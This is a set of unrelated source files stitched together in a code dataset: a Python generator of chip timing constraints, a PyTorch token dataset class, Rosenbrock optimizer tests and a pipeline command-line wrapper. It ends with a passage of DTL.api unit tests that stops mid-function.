create_clock -name clk_tx_indiv \\
-period {clk_4x_per} \\
-waveform {{0 {0.5*clk_4x_per}}} \\
[get_pins itx/indiv/out]
# PI outputs
create_clock -name clk_tx_pi_0 \\
-period {clk_4x_per} \\
-waveform {{0 {0.5*clk_4x_per}}} \\
[get_pins itx/iPI[0].iPI/clk_out_slice]
create_clock -name clk_tx_pi_1 \\
-period {clk_4x_per} \\
-waveform {{{0.25*clk_4x_per} {0.75*clk_4x_per}}} \\
[get_pins itx/iPI[1].iPI/clk_out_slice]
create_clock -name clk_tx_pi_2 \\
-period {clk_4x_per} \\
-waveform {{{0.5*clk_4x_per} {clk_4x_per}}} \\
[get_pins itx/iPI[2].iPI/clk_out_slice]
create_clock -name clk_tx_pi_3 \\
-period {clk_4x_per} \\
-waveform {{{0.75*clk_4x_per} {1.25*clk_4x_per}}} \\
[get_pins itx/iPI[3].iPI/clk_out_slice]
# Half-rate and quarter-rate clocks
create_generated_clock -name clk_tx_hr \\
-source [get_pins itx/div0/clkin] \\
-divide_by 2 \\
[get_pins itx/div0/clkout]
create_generated_clock -name clk_tx_qr \\
-source [get_pins itx/div1/clkin] \\
-divide_by 2 \\
[get_pins itx/div1/clkout]
#####################
# clock uncertainty #
#####################
# clk_retimer
set_clock_uncertainty -setup 0.03 clk_retimer
set_clock_uncertainty -hold 0.03 clk_retimer
# clk_tx_pi
set_clock_uncertainty -setup 0.01 clk_tx_pi_0
set_clock_uncertainty -hold 0.01 clk_tx_pi_0
set_clock_uncertainty -setup 0.01 clk_tx_pi_1
set_clock_uncertainty -hold 0.01 clk_tx_pi_1
set_clock_uncertainty -setup 0.01 clk_tx_pi_2
set_clock_uncertainty -hold 0.01 clk_tx_pi_2
set_clock_uncertainty -setup 0.01 clk_tx_pi_3
set_clock_uncertainty -hold 0.01 clk_tx_pi_3
# half rate
set_clock_uncertainty -setup 0.02 clk_tx_hr
set_clock_uncertainty -hold 0.02 clk_tx_hr
# quarter rate
set_clock_uncertainty -setup 0.03 clk_tx_qr
set_clock_uncertainty -hold 0.03 clk_tx_qr
################
# JTAG interface
################
# These numbers come from looking at datasheets for JTAG cables
# https://www.analog.com/media/en/technical-documentation/application-notes/ee-68.pdf
# https://www2.lauterbach.com/pdf/arm_app_jtag.pdf
# TCK clock signal: 20 MHz max
create_clock -name clk_jtag -period 50.0 [get_ports jtag_intf_i.phy_tck]
set_clock_uncertainty -setup 0.03 clk_jtag
set_clock_uncertainty -hold 0.03 clk_jtag
# TCK constraints
set_input_transition 0.5 [get_port jtag_intf_i.phy_tck]
# timing constraints for TDI (changes 0 to 5 ns from falling edge of JTAG clock)
set_input_transition 0.5 [get_port jtag_intf_i.phy_tdi]
set_input_delay -clock clk_jtag -max 0.5 -clock_fall [get_port jtag_intf_i.phy_tdi]
set_input_delay -clock clk_jtag -min 0.0 -clock_fall [get_port jtag_intf_i.phy_tdi]
# timing constraints for TMS (changes 0 to 5 ns from falling edge of JTAG clock)
set_input_transition 0.5 [get_port jtag_intf_i.phy_tms]
set_input_delay -clock clk_jtag -max 5.0 -clock_fall [get_port jtag_intf_i.phy_tms]
set_input_delay -clock clk_jtag -min 0.0 -clock_fall [get_port jtag_intf_i.phy_tms]
# timing constraints for TDO (setup time 12.5 ns, hold time 0.0)
# TDO changes on the falling edge of TCK but is sampled on the rising edge
set_output_delay -clock clk_jtag -max 12.5 [get_port jtag_intf_i.phy_tdo]
set_output_delay -clock clk_jtag -min 0.0 [get_port jtag_intf_i.phy_tdo]
# TRST_N is asynchronous
set_input_transition 0.5 [get_port jtag_intf_i.phy_trst_n]
############################
# Asynchronous clock domains
############################
set_clock_groups -asynchronous \\
-group {{ clk_jtag }} \\
-group {{ \\
clk_tx_pi_0 \\
clk_tx_pi_1 \\
clk_tx_pi_2 \\
clk_tx_pi_3 \\
clk_tx_hr \\
clk_tx_qr \\
}} \\
-group {{ clk_retimer clk_main_buf }} \\
-group {{ clk_async }} \\
-group {{ clk_mdll_ref_p clk_mdll_ref_n }} \\
-group {{ clk_mdll_mon_p clk_mdll_mon_n }} \\
-group {{ clk_mdll }} \\
-group {{ clk_tx_indiv }}
####################
# Other external I/O
####################
# external analog inputs
set ext_dont_touch_false_path {{ \\
ext_rx_inp \\
ext_rx_inn \\
ext_Vcm \\
ext_Vcal \\
ext_rx_inp_test \\
ext_rx_inn_test \\
ext_tx_outp \\
ext_tx_outn \\
ext_clk_async_p \\
ext_clk_async_n \\
ext_clkp \\
ext_clkn \\
ext_mdll_clk_refp \\
ext_mdll_clk_refn \\
ext_mdll_clk_monp \\
ext_mdll_clk_monn \\
clk_out_p \\
clk_out_n \\
clk_trig_p \\
clk_trig_n \\
}}
set_dont_touch_network [get_ports $ext_dont_touch_false_path]
set_false_path -through [get_ports $ext_dont_touch_false_path]
set ext_false_path_only {{ \\
ext_rstb \\
ext_dump_start \\
clk_cgra \\
ramp_clock \\
freq_lvl_cross \\
}}
set_false_path -through [get_ports $ext_false_path_only]
###################
# Top-level buffers
###################
# IOs are all false paths
set_false_path -through [get_pins ibuf_*/*]
# Input buffer inputs (which are external pins)
# should not have buffers added
set_dont_touch_network [get_pins ibuf_*/in*]
#############
# Analog core
#############
# Debugging signals are all false paths
set_false_path -through [get_pins iacore/adbg_intf_i.*]
# Clock outputs in the debug interface should not have buffers added
set adbg_clk_pins [get_pins {{ \\
iacore/adbg_intf_i.del_out_pi \\
iacore/adbg_intf_i.pi_out_meas* \\
iacore/adbg_intf_i.del_out_rep* \\
iacore/adbg_intf_i.inbuf_out_meas \\
}}]
#############
# Transmitter
#############
# Debugging signals are all false paths
set_false_path -through [get_pins itx/tx.*]
# Clock outputs in the debug interface should not have buffers added
set tdbg_clk_pins [get_pins {{ \\
itx/*del_out_pi* \\
itx/*pi_out_meas* \\
itx/*inbuf_out_meas* \\
}}]
set_dont_touch_network $tdbg_clk_pins
# TODO: do we need to set dont_touch through the hierarchy?
# Or will it be applied automatically to instances within?
# Phase interpolators
for {{set i 0}} {{$i < 4}} {{incr i}} {{
set_dont_touch [get_cells "itx/iPI[$i].iPI"]
}}
# Input divider
set_dont_touch [get_cells itx/indiv]
# Internal nets
set_dont_touch [get_nets "itx/qr_data_p"]
set_dont_touch [get_nets "itx/qr_data_n"]
set_dont_touch [get_nets "itx/mtb_n"]
set_dont_touch [get_nets "itx/mtb_p"]
# Muxes
for {{set i 0}} {{$i < 2}} {{incr i}} {{
# Half-rate muxes (the mux is intentionally left out because
# there is a mapping problem for FreePDK45
for {{set j 1}} {{$j < 5}} {{incr j}} {{
set_dont_touch [get_nets "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hd"]
# multipath constraint from quarter-rate to half-rate muxes
for {{set k 0}} {{$k < 2}} {{incr k}} {{
set_multicycle_path \\
1 \\
-setup \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_$k/mux_0/sel"] \\
-to [get_pins "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_2/dff_$k/D"]
set_multicycle_path \\
0 \\
-hold \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_$k/mux_0/sel"] \\
-to [get_pins "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_2/dff_$k/D"]
}}
# dont_touch nets within each 2t1 mux
for {{set k 0}} {{$k < 3}} {{incr k}} {{
set_dont_touch [get_nets "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_$k/D0L"]
set_dont_touch [get_nets "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_$k/D1M"]
}}
}}
# Quarter-rate muxes
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D0DQ"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D0DI"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D0DQB"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D1DQB"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D0DIB"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D1DIB"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/mux_out"]
####################
# Multicycle paths #
####################
# all are launched on clk_tx_hr, which is
# divided by two from clk_tx_pi_2 (QB)
# din[0]: captured on I @ dff_IB0
set_multicycle_path \\
1 \\
-setup \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[1].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_IB0/D"]
set_multicycle_path \\
0 \\
-hold \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[1].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_IB0/D"]
# din[1]: captured on Q @ dff_QB0
set_multicycle_path \\
1 \\
-setup \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[2].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_QB0/D"]
set_multicycle_path \\
0 \\
-hold \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[2].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_QB0/D"]
# din[2]: captured on I @ dff_I0
set_multicycle_path \\
1 \\
-setup \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[3].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_I0/D"]
set_multicycle_path \\
0 \\
-hold \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[3].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_I0/D"]
# din[3]: captured on Q @ dff_Q0
set_multicycle_path \\
1 \\
-setup \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[4].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_Q0/D"]
set_multicycle_path \\
0 \\
-hold \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[4].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_Q0/D"]
'''
# Process-specific: the fixed quarter-rate mux cell only exists in the
# tsmc16 ADK, so only emit its dont_touch there.
if os.environ['adk_name'] == 'tsmc16':
    output += f'''
set_dont_touch [get_cells "itx/qr_mux_4t1_$i/mux_4/mux_4_fixed"]
'''
output += f'''
for {{set j 0}} {{$j < 4}} {{incr j}} {{
set_dont_touch [get_cells "itx/qr_mux_4t1_$i/i_INVBUF[$j].inv_buf/inv_4_fixed"]
}}
}}
# Output buffer
for {{set i 0}} {{$i < 2}} {{incr i}} {{
set_dont_touch [get_cells "itx/buf1/iBUF[$i].i_tri_buf_n/tri_buf"]
set_dont_touch [get_cells "itx/buf1/iBUF[$i].i_tri_buf_p/tri_buf"]
set_false_path -through [get_pins -of_objects "itx/buf1/iBUF[$i].i_tri_buf_n/tri_buf"]
set_false_path -through [get_pins -of_objects "itx/buf1/iBUF[$i].i_tri_buf_p/tri_buf"]
}}
set_dont_touch [get_nets "itx/buf1/BTN"]
set_dont_touch [get_nets "itx/buf1/BTP"]
set_dont_touch [get_cells "itx/buf1/i_term_n"]
set_dont_touch [get_cells "itx/buf1/i_term_p"]
# Make sure termination resistor is wired up
set_dont_touch [get_pins "itx/buf1/DOUTP"]
set_dont_touch [get_pins "itx/buf1/DOUTN"]
set_dont_touch [get_pins "itx/dout_p"]
set_dont_touch [get_pins "itx/dout_n"]
# Set a false path on the termination resistors to avoid
# a combinational loop error
set_false_path -through [get_pins -of_objects "itx/buf1/i_term_n"]
set_false_path -through [get_pins -of_objects "itx/buf1/i_term_p"]
# Make sure the transmitter is not retimed. This may already be in
# the main DC step, but it's not clear that it's being applied.
set_dont_retime [get_cells itx]
######
# MDLL
######
# IOs for MDLL are all false paths
set_false_path -through [get_pins -of_objects imdll]
# Unused clock IOs should not have buffers added
set_dont_touch_network [get_pins imdll/clk_0]
'''
# Process-specific: the fixed inverter cell only exists in the tsmc16
# ADK, so only emit its dont_touch there.
if os.environ['adk_name'] == 'tsmc16':
    output += f'''
set_dont_touch [get_cells "minv_i/inv_1_fixed"]
'''
output += f'''
set_dont_touch_network [get_pins imdll/clk_90]
set_dont_touch_network [get_pins imdll/clk_180]
set_dont_touch_network [get_pins imdll/clk_270]
################
# Output buffer
################
# IOs for output buffers are all false paths
set_false_path -through [get_pins -of_objects idcore/out_buff_i]
# Clock outputs should not have buffers added
set_dont_touch_network [get_pins idcore/out_buff_i/clock_out_*]
set_dont_touch_network [get_pins idcore/out_buff_i/trigg_out_*]
#################
# Net constraints
#################
# specify defaults for all nets
set_driving_cell -no_design_rule -lib_cell $ADK_DRIVING_CELL [all_inputs]
set_max_transition {0.2*time_scale} [current_design]
set_max_capacitance {0.1*cap_scale} [current_design]
set_max_fanout 20 {design_name}
# specify loads for outputs
set_load {0.1*cap_scale} [all_outputs]
# change the max capacitance for ext_Vcal only
# it's inout, so the previous "set_load"
# command appears to apply to it as well
set_max_capacitance {1.0*cap_scale} [get_port ext_Vcal]
# Tighten transition constraint for clocks declared so far
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_jtag]
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_retimer]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_tx_indiv]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_tx_pi_0]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_tx_pi_1]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_tx_pi_2]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_tx_pi_3]
set_max_transition {0.05*time_scale} -clock_path [get_clock clk_tx_hr]
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_tx_qr]
# Set transition time for high-speed signals monitored from iacore
# The transition time is 10% of a 4 GHz period.
set adbg_count 0
foreach x [get_object_name $adbg_clk_pins] {{
create_clock -name "clk_mon_net_$adbg_count" -period {0.25*time_scale} [get_pin $x]
set_max_transition {0.025*time_scale} -clock_path [get_clock "clk_mon_net_$adbg_count"]
incr adbg_count
}}
###################################
# Set transition times at top-level
###################################
# clk_async
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_async]
# clk_main - cant be lower than 0.017!
set_max_transition {0.017*time_scale} -clock_path [get_clock clk_main_buf]
# MDLL reference
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_mdll_ref_p]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_mdll_ref_n]
# MDLL monitor
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_mdll_mon_p]
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_mdll_mon_n]
# MDLL output
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_mdll]
# Clock going to the CGRA
set_max_transition {0.1*time_scale} [get_pin idcore/clk_cgra]
#########################################
# Set transition times in the transmitter
#########################################
# Mux +
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_0/din[0]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_0/din[1]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_0/din[2]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_0/din[3]}}]
set_max_transition {0.008*time_scale} [get_pin {{itx/qr_mux_4t1_0/data}}]
# Mux -
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_1/din[0]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_1/din[1]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_1/din[2]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_1/din[3]}}]
set_max_transition {0.008*time_scale} [get_pin {{itx/qr_mux_4t1_1/data}}]
echo [all_clocks]
'''
# Process-specific constraints: tsmc16 pad cells need explicit
# dont_touch settings (some lack the property by default).
if os.environ['adk_name'] == 'tsmc16':
    output += f'''
# From ButterPHY
# TODO: what is mvt_target_libs?
# foreach lib $mvt_target_libs {{
#     set_dont_use [file rootname [file tail $lib]]/*D0BWP*
# }}
# From Garnet
# Apparently ANAIOPAD and IOPAD cells don't all have the dont_touch property
# As a result, set the property here if there are any such cells
if {{[llength [get_cells ANAIOPAD*]] > 0}} {{
    set_dont_touch [get_cells ANAIOPAD*]
}}
if {{[llength [get_cells IOPAD*]] > 0}} {{
    set_dont_touch [get_cells IOPAD*]
}}
'''
# Emit the generated constraints file under ./outputs/.
OUTPUT_DIR = Path('outputs')
OUTPUT_DIR.mkdir(parents=True, exist_ok=True)
(OUTPUT_DIR / OUTPUT_FILE).write_text(output)
| StarcoderdataPython |
3280682 | from pathlib import Path
from typing import List
import numpy as np
import torch
from tokenizers import Tokenizer
from torch.utils.data import Dataset
from tqdm import tqdm
class TextDataset(Dataset):
    """In-memory token dataset serving fixed-length windows over documents.

    Each source file is tokenized (or loaded pre-tokenized) and kept as
    one token array; __getitem__ presents sliding windows over all files
    as a single flat index space.
    """

    def __init__(self, text_files: List[Path], tokenizer_path: str, sequence_length: int = 128, stride: int = 128, pretokenized: bool = False):
        """
        A class that holds a basic text dataset in memory in tokenized form, along with the tokenizer
        :param text_files: list of paths to the various text files/documents to use as data
        :param tokenizer_path: path to huggingface Tokenizers json
        :param sequence_length: length of sequences to return
        :param stride: gap between the starts of consecutive windows
        :param pretokenized: if True, files are .npz arrays of token ids instead of raw text
        """
        super().__init__()
        self.tokenizer = Tokenizer.from_file(tokenizer_path)
        self.text_files = text_files
        # BUG FIX: the original test was 'stride == 0', which let negative
        # strides through despite the message promising stride >= 1.
        if stride < 1:
            raise ValueError("Stride must be >= 1, otherwise the same piece of data will be repeated infinite times")
        self.encoded_tokens = []
        self.n_tokens_windows = np.zeros(len(text_files), dtype=np.uint32)
        self.length = 0
        self.sequence_length = sequence_length
        self.stride = stride
        total_tokens = 0
        for i, file in enumerate(tqdm(text_files)):
            if not pretokenized:
                with open(file, 'r', encoding='utf-8') as reader:
                    text = reader.read()
                # wrap each document in start/end-of-sequence markers
                text = "<SOS>" + text + "<EOS>"
                ids = self.tokenizer.encode(text).ids
            else:
                # pre-tokenized files are .npz archives holding one array
                ids = np.load(file, mmap_mode='r+')
                ids = ids.f.arr_0
                # NOTE(review): int16 caps the usable vocabulary at 32767
                # token ids -- confirm the tokenizer's vocab fits.
                ids = ids.astype(np.int16)
            self.encoded_tokens.append(ids)
            total_tokens += len(ids)
            # Number of full windows in this file (the trailing partial
            # window is dropped).  BUG FIX: clamp at 0 -- for files
            # shorter than sequence_length the difference is negative,
            # which corrupted self.length and underflowed the uint32
            # window table.
            n_windows = max((len(ids) - sequence_length) // stride, 0)
            self.n_tokens_windows[i] = n_windows
            self.length += n_windows
        print("Loaded dataset of", total_tokens, "tokens")

    def __len__(self) -> int:
        return self.length

    def __getitem__(self, index: int) -> torch.LongTensor:
        """Return the index-th window across all files as a LongTensor."""
        for idx, n_windows in enumerate(self.n_tokens_windows):
            if index < n_windows:
                token_idx = index * self.stride
                return torch.LongTensor(self.encoded_tokens[idx][token_idx:token_idx + self.sequence_length])
            index -= n_windows  # move the flat index into the next file
        # BUG FIX: the original fell off the loop and silently returned
        # None for out-of-range indices.
        raise IndexError(index)

    def decode(self, ids: List[int]) -> str:
        """Decode token ids back to text via the dataset's tokenizer."""
        return self.tokenizer.decode(ids)
| StarcoderdataPython |
3383237 | <reponame>yuanz271/PyDSTool<gh_stars>1-10
#!/usr/bin/env python
# <NAME>
# Last Change : 2007-08-24 10:59
"""
Class defining the Rosenbrock function
"""
from __future__ import absolute_import
import numpy
from numpy.testing import assert_almost_equal, assert_array_almost_equal
from PyDSTool.Toolbox.optimizers import criterion, step, optimizer, line_search
class Rosenbrock:
    """The classic Rosenbrock banana function, with analytic derivatives.

    The global minimum is f(1, ..., 1) = 0.
    """

    def __init__(self, dimension):
        """Store the problem dimension."""
        self.dimension = dimension

    def __call__(self, x):
        """Evaluate the Rosenbrock function at the point x."""
        head = x[:-1]
        tail = x[1:]
        return numpy.sum(100.0 * (tail - head**2.0)**2.0 + (1. - head)**2.0)

    def gradient(self, x):
        """Evaluate the analytic gradient at the point x."""
        mid = x[1:-1]
        left = x[:-2]
        right = x[2:]
        grad = numpy.zeros(x.shape, x.dtype)
        grad[1:-1] = 200. * (mid - left**2.) - 400. * (right - mid**2.) * mid - 2. * (1. - mid)
        grad[0] = -400. * x[0] * (x[1] - x[0]**2.) - 2. * (1. - x[0])
        grad[-1] = 200. * (x[-1] - x[-2]**2.)
        return grad

    def hessian(self, x):
        """Evaluate the analytic Hessian at the point x."""
        # off-diagonal bands are symmetric: -400 * x_k on both sides
        off_diag = -400. * x[:-1]
        H = numpy.diag(off_diag, 1) + numpy.diag(off_diag, -1)
        diagonal = numpy.zeros(len(x), x.dtype)
        diagonal[0] = 1200. * x[0]**2. - 400. * x[1] + 2.
        diagonal[-1] = 200.
        diagonal[1:-1] = 202. + 1200. * x[1:-1]**2. - 400. * x[2:]
        return H + numpy.diag(diagonal)
def test_simple_gradient_monotony():
    """Gradient descent with a monotony-or-iteration-cap stop criterion
    should converge near the Rosenbrock minimum (1, 1)."""
    # BUG FIX: numpy.float (a deprecated alias of builtin float) was
    # removed in NumPy 1.24 and raises AttributeError there.
    startPoint = numpy.empty(2, float)
    startPoint[0] = -1.01
    startPoint[-1] = 1.01
    optimi = optimizer.StandardOptimizer(function = Rosenbrock(2), step = step.GradientStep(), criterion = criterion.OrComposition(criterion.MonotonyCriterion(0.00001), criterion.IterationCriterion(10000)), x0 = startPoint, line_search = line_search.SimpleLineSearch(alpha_step = 0.001))
    assert_almost_equal(optimi.optimize(), numpy.ones(2, float), decimal=1)
def test_simple_gradient_relative():
    """Gradient descent with a relative-value stop criterion should
    converge near the Rosenbrock minimum (1, 1)."""
    # BUG FIX: numpy.float was removed in NumPy 1.24; use builtin float.
    startPoint = numpy.empty(2, float)
    startPoint[0] = -1.01
    startPoint[-1] = 1.01
    optimi = optimizer.StandardOptimizer(function = Rosenbrock(2), step = step.GradientStep(), criterion = criterion.RelativeValueCriterion(0.00001), x0 = startPoint, line_search = line_search.SimpleLineSearch(alpha_step = 0.001))
    assert_almost_equal(optimi.optimize(), numpy.ones(2, float), decimal=1)
def test_simple_newton_relative():
    """Newton steps with a relative-value stop criterion should converge
    to the Rosenbrock minimum (1, 1)."""
    # BUG FIX: numpy.float was removed in NumPy 1.24; use builtin float.
    startPoint = numpy.empty(2, float)
    startPoint[0] = -1.01
    startPoint[-1] = 1.01
    optimi = optimizer.StandardOptimizer(function = Rosenbrock(2), step = step.NewtonStep(), criterion = criterion.RelativeValueCriterion(0.00001), x0 = startPoint, line_search = line_search.SimpleLineSearch())
    assert_almost_equal(optimi.optimize(), numpy.ones(2, float))
def test_wpr_cwgradient():
    """Conjugate gradient (CW variant) with the Wolfe-Powell line search
    should converge to the Rosenbrock minimum (1, 1)."""
    # BUG FIX: numpy.float was removed in NumPy 1.24; use builtin float.
    startPoint = numpy.empty(2, float)
    startPoint[0] = -1.01
    startPoint[-1] = 1.01
    optimi = optimizer.StandardOptimizer(function = Rosenbrock(2), step = step.CWConjugateGradientStep(), criterion = criterion.criterion(iterations_max = 1000, ftol = 0.00000001, gtol = 0.0001), x0 = startPoint, line_search = line_search.WolfePowellRule())
    assert_array_almost_equal(optimi.optimize(), numpy.ones(2, float))
def test_swpr_dygradient():
    """Conjugate gradient (DY variant) with the strong Wolfe-Powell line
    search should converge to the Rosenbrock minimum (1, 1)."""
    # BUG FIX: numpy.float was removed in NumPy 1.24; use builtin float.
    startPoint = numpy.empty(2, float)
    startPoint[0] = -1.01
    startPoint[-1] = 1.01
    optimi = optimizer.StandardOptimizer(function = Rosenbrock(2), step = step.DYConjugateGradientStep(), criterion = criterion.criterion(iterations_max = 1000, ftol = 0.00000001, gtol = 0.0001), x0 = startPoint, line_search = line_search.StrongWolfePowellRule())
    assert_array_almost_equal(optimi.optimize(), numpy.ones(2, float), decimal = 4)
| StarcoderdataPython |
4813579 | <filename>wrapper/__main__.py
import sys
import io
import argparse
from wrapper import pipeline
import logging
logger = logging.getLogger(__name__)
# ---- Command line -----------------------------------------------------------
# All options are optional; documents to process are read from stdin.
parser = argparse.ArgumentParser(description='VU Reading Machine pipeline')
parser.add_argument('-c', '--cfg_file', dest='cfg_file', default='./cfg/pipeline.yml', type=str, help='config file')
parser.add_argument('-d', '--bin_dir', dest='bin_dir', default='./scripts/bin/', type=str, help='component scripts directory')
parser.add_argument('-i', '--in_layers', dest='in_layers_str', type=str, help='input layers and their prerequisite components are filtered out (comma-separated list string)')
parser.add_argument('-o', '--out_layers', dest='out_layers_str', type=str, help='only runs the components needed to produce the given output layers (comma-separated list string)')
parser.add_argument('-e', '--exclude_components', dest='exclude_components_str', type=str, help='excludes components from the pipeline (comma-separated list string)')
parser.add_argument('-l', '--log_file', dest='log_file', type=str, help='log file')
parser.add_argument('-s', '--component_args', dest='component_args', type=str, help='component arguments string')
args = parser.parse_args()

# Log plain message text to the given file (or to stderr when -l is omitted,
# since filename=None falls back to the default stream handler).
logging.basicConfig(format='%(message)s',
                    filename=args.log_file,
                    filemode='w',
                    level=logging.INFO)

cfg_file = args.cfg_file
bin_dir = args.bin_dir

# Each comma-separated option string becomes a (possibly empty) list.
input_layers = []
if args.in_layers_str is not None:
    input_layers = args.in_layers_str.split(',')
output_layers = []
if args.out_layers_str is not None:
    output_layers = args.out_layers_str.split(',')
exclude_components = []
if args.exclude_components_str is not None:
    exclude_components = args.exclude_components_str.split(',')

# -s takes 'module:option:value' triples separated by ';' and maps each module
# name to an "option value" argument string.
# NOTE(review): listing the same module twice keeps only the last triple --
# confirm whether multiple options per module should be supported.
subargs = {}
if args.component_args is not None:
    for argv in args.component_args.split(';'):
        mod_name, opt_name, opt_val = argv.split(':')
        subargs[mod_name] = '{} {}'.format(opt_name, opt_val)

# Build the pipeline from the YAML config and stream stdin through it.
# Configuration problems surface as ValueError and are logged, not raised.
try:
    p = pipeline.create_pipeline(cfg_file, in_layers=input_layers, goal_layers=output_layers, excepted_components=exclude_components, bindir=bin_dir, subargs=subargs)
    input_file = sys.stdin
    p.execute(input_file)
except ValueError as e:
    logger.error(e)
| StarcoderdataPython |
18024 | <filename>DTL_tests/unittests/test_api.py
import os
import time
import unittest
from DTL.api import *
class TestCaseApiUtils(unittest.TestCase):
    """Tests for DTL.api apiUtils helpers: synthesize, wildcardToRe,
    getClassName and BitTracker.

    NOTE: the deprecated assertEquals alias (removed in Python 3.12) has been
    replaced with assertEqual throughout.
    """

    def setUp(self):
        # Synthesize an accessor-backed attribute on this instance and record
        # the tracker bit assigned to this object.
        apiUtils.synthesize(self, 'mySynthesizeVar', None)
        self.bit = apiUtils.BitTracker.getBit(self)

    def test_wildcardToRe(self):
        # A Windows wildcard path becomes a case-insensitive escaped regex;
        # backslash and forward-slash spellings must yield the same pattern.
        self.assertEqual(apiUtils.wildcardToRe('c:\CIG\main\*.*'),
                         '(?i)c\\:\\\\CIG\\\\main\\\\[^\\\\]*\\.[^\\\\]*$')
        self.assertEqual(apiUtils.wildcardToRe('c:\CIG\main\*.*'),
                         apiUtils.wildcardToRe('c:/CIG/main/*.*'))

    def test_synthesize(self):
        # synthesize() must create the backing field plus getter/setter accessors.
        self.assertIn('_mySynthesizeVar', self.__dict__)
        self.assertTrue(hasattr(self, 'mySynthesizeVar'))
        self.assertTrue(hasattr(self, 'getMySynthesizeVar'))
        self.assertTrue(hasattr(self, 'setMySynthesizeVar'))
        self.assertEqual(self.getMySynthesizeVar(), self.mySynthesizeVar)

    def test_getClassName(self):
        self.assertEqual(apiUtils.getClassName(self), 'TestCaseApiUtils')

    def test_bittracker(self):
        # Repeated lookups for the same object must return the same bit.
        self.assertEqual(apiUtils.BitTracker.getBit(self), self.bit)
class TestCaseDotifyDict(unittest.TestCase):
    """Tests attribute-style (dotted) access, update() and repr round-tripping
    of DotifyDict.  Deprecated assertEquals replaced with assertEqual."""

    def setUp(self):
        self.dotifydict = DotifyDict({'one': {'two': {'three': 'value'}}})

    def test_dotifydict(self):
        # Nested dicts are reachable via attribute access and compare equal to
        # plain dicts.
        self.assertEqual(self.dotifydict.one.two, {'three': 'value'})
        self.dotifydict.one.two.update({'three': 3, 'four': 4})
        self.assertEqual(self.dotifydict.one.two.four, 4)
        self.assertEqual(self.dotifydict.one, self.dotifydict.one)
        # Dotted keys work with the `in` operator.
        self.assertIn('two.three', (self.dotifydict.one))
        # repr() must evaluate back to an equal object (round-trip).
        self.assertEqual(str(self.dotifydict), "DotifyDict(datadict={'one': DotifyDict(datadict={'two': DotifyDict(datadict={'four': 4, 'three': 3})})})")
        self.assertEqual(self.dotifydict.one.two, eval(str(self.dotifydict.one.two)))
class TestCasePath(unittest.TestCase):
    """Tests DTL.api Path construction, joining and separator normalization.
    Deprecated assertEquals replaced with assertEqual."""

    def setUp(self):
        self.filepath = Path.getTempPath()

    def test_path(self):
        temp_path = Path.getTempPath()
        # Two independently constructed temp paths must be equal piecewise.
        self.assertEqual(self.filepath, temp_path)
        self.assertEqual(self.filepath.name, temp_path.name)
        self.assertEqual(self.filepath.parent, temp_path.parent)
        self.assertIn(self.filepath.parent.parent.name, self.filepath)
        # Mixed separators must normalize to the platform's os.path.join result,
        # and Path must hash consistently with the equivalent string (set test).
